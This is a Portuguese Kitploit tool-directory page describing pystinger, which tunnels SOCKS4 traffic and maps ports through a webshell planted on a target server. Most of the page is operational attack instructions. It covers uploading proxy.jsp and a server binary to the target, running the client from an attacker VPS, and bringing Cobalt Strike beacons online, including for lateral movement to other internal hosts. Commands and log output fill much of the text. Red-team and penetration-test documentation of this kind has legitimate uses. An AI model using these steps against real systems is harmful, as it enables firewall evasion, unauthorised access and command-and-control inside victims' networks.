Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
pystinger — Contornar firewall para encaminhamento de tráfego usando webshell | Kitploit
Ferramentas/GitHubGitHub/funnywolf/pystinger
Frameworks de ExploraçãoGeração de PayloadsEvasão de IDS/IPSMovimento LateralExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubfunnywolf/pystinger

pystinger

Contornar firewall para encaminhamento de tráfego usando webshell

Ver Repositório
1.4k204há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

pystinger

Inglês | 简体中文

O Pystinger implementa proxy SOCK4 e mapeamento de portas através de webshell.

Pode ser usado diretamente pelo metasploit-framework, viper, cobalt strike para sessão online.

O Pystinger é desenvolvido em python e atualmente suporta três scripts de proxy: php, jsp(x) e aspx.

Uso

Suponha que o nome de domínio do servidor seja http://example.com:8080O endereço IP da rede interna do servidor é 192.168.3.11

Proxy SOCK4

  • Faça upload de proxy.jsp para o servidor alvo e garanta que http://example.com:8080/proxy.jsp possa ser acessado, a página retorna UTF-8
  • Faça upload de stinger_server.exe para o servidor alvo, no AntSword execute cmd start D:/XXX/stinger_server.exe para iniciar o pystinger-server

Não execute D:/xxx/stinger_server.exe diretamente, isso causará desconexão TCP

  • Execute ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 no seu VPS
  • Você verá a seguinte saída
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Agora você iniciou um proxy socks4a no VPS 127.0.0.1:60000 para a rede interna de example.com.
  • Agora o servidor alvo (example.com) 127.0.0.1:60020 foi mapeado para o VPS 127.0.0.1:60020

Beacon do cobaltstrike online para alvo único

  • Faça upload de proxy.jsp para o servidor alvo e garanta que http://example.com:8080/proxy.jsp possa ser acessado, a página retorna UTF-8
  • Faça upload de stinger_server.exe para o servidor alvo, no AntSword execute cmd start D:/XXX/stinger_server.exe para iniciar o pystinger-server

Não execute D:/xxx/stinger_server.exe diretamente, isso causará desconexão TCP

  • Execute ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 no seu VPS
  • Você verá a seguinte saída
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Adicione um listener no cobaltstrike, a porta do listener é 60020 (porta Handler/LISTEN no RAT CONFIG da saída), o endereço do listener é 127.0.0.1
  • Gere o payload, faça upload para o alvo e execute.

Beacon do cobaltstrike online para múltiplos alvos

  • Faça upload de proxy.jsp para o servidor alvo e garanta que http://example.com:8080/proxy.jsp possa ser acessado, a página retorna UTF-8
  • Faça upload de stinger_server.exe para o servidor alvo, no AntSword execute cmd start D:/XXX/stinger_server.exe 192.168.3.11 para iniciar o pystinger-server (192.168.3.11 é o endereço IP da rede interna do alvo)

192.168.3.11 pode ser alterado para 0.0.0.0

  • Execute ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 no seu VPS
  • Você verá a seguinte saída
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Adicione um listener no cobaltstrike, a porta do listener é 60020 (porta Handler/LISTEN no RAT CONFIG da saída), o endereço do listener é 192.168.3.11
  • Gere o payload, faça upload para o alvo e execute.
  • Ao se mover lateralmente para outros hosts, você pode apontar o payload para 192.168.3.11:60020 para fazer o beacon ficar online

Cabeçalho personalizado e proxy

  • Se o webshell precisar configurar cookie ou autorização, o cabeçalho da requisição pode ser configurado através do parâmetro --header --header "Authorization: XXXXXX,Cookie: XXXXX"

  • Se o webshell precisar ser acessado por proxy, você pode configurar o proxy através de --proxy --proxy "socks5:127.0.0.1:1081"

Ferramentas relacionadas

https://github.com/nccgroup/ABPTTS

https://github.com/sensepost/reGeorg

https://github.com/SECFORCE/Tunna

Testado

stinger_server\stinger_client

  • windows
  • linux

proxy.jsp(x)/php/aspx

  • php7.2
  • tomcat7.0
  • iis8.0

Log de atualizações

2.0 Data da atualização: 2019-09-29

  • Serviço de proxy Socks4 movido para o cliente

2.1 Data da atualização: 2020-01-07

  • Suporte para cobaltstrike online (mapeamento de portas)

O desenvolvimento é apoiado pelo software da jetbrains.
https://www.jetbrains.com/?from=pystinger

Baixar ferramenta